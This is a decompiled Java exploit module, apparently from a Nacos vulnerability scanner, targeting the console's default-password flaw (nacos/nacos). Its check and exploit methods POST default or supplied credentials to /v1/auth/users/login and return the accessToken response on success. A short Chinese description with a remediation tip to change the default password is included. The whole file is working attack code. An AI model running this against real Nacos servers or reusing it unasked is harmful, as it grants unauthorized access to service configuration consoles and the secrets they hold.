package com.alibaba.nacos.exploit;

import com.alibaba.nacos.entity.ExecutionResult;
import com.alibaba.nacos.entity.Vulnerability;
import com.alibaba.nacos.httpclient.MyHttpRequests;
import com.alibaba.nacos.httpclient.MyHttpResponse;

/* loaded from: input_file:com/alibaba/nacos/exploit/Alibaba_Nacos_console_default_password.class */
public class Alibaba_Nacos_console_default_password implements Vulnerability {
    final String VulName = "Nacos控制台默认口令漏洞(nacos,nacos)";

    @Override // com.alibaba.nacos.entity.Vulnerability
    public String getInfo() {
        getClass();
        return String.format("漏洞名称: %s\n\n漏洞描述: %s\n\n漏洞影响版本: %s\n\n漏洞修复方案: %s\n\n参考链接: %s\n\n", "Nacos控制台默认口令漏洞(nacos,nacos)", "控制台默认密码为nacos/nacos", "与Nacos版本无关,取决于是否使用了默认口令(nacos,nacos)", "禁止使用默认密码,并且设置较为复杂的密码", "");
    }

    @Override // com.alibaba.nacos.entity.Vulnerability
    public ExecutionResult check(String str) throws Exception {
        try {
            MyHttpResponse sendRequest = new MyHttpRequests().sendRequest((str.endsWith("/") ? str.substring(0, str.length() - 1) : str) + "/v1/auth/users/login", "POST", "username=nacos&password=nacos", null, true);
            if (sendRequest.getResponseBody().contains("accessToken")) {
                getClass();
                return new ExecutionResult(true, "Nacos控制台默认口令漏洞(nacos,nacos)", sendRequest.getResponseBody(), null);
            }
            getClass();
            return new ExecutionResult(false, "Nacos控制台默认口令漏洞(nacos,nacos)", null, null);
        } catch (Exception e) {
            getClass();
            return new ExecutionResult(false, "Nacos控制台默认口令漏洞(nacos,nacos)", null, null);
        }
    }

    @Override // com.alibaba.nacos.entity.Vulnerability
    public ExecutionResult exploit(String str, String... strArr) throws Exception {
        try {
            MyHttpResponse sendRequest = new MyHttpRequests().sendRequest((str.endsWith("/") ? str.substring(0, str.length() - 1) : str) + "/v1/auth/users/login", "POST", "username=" + strArr[0] + "&password=" + strArr[1], null, true);
            if (sendRequest.getResponseBody().contains("accessToken")) {
                getClass();
                return new ExecutionResult(true, "Nacos控制台默认口令漏洞(nacos,nacos)", sendRequest.getResponseBody(), null);
            }
            getClass();
            return new ExecutionResult(false, "Nacos控制台默认口令漏洞(nacos,nacos)", null, null);
        } catch (Exception e) {
            getClass();
            return new ExecutionResult(false, "Nacos控制台默认口令漏洞(nacos,nacos)", null, null);
        }
    }
}
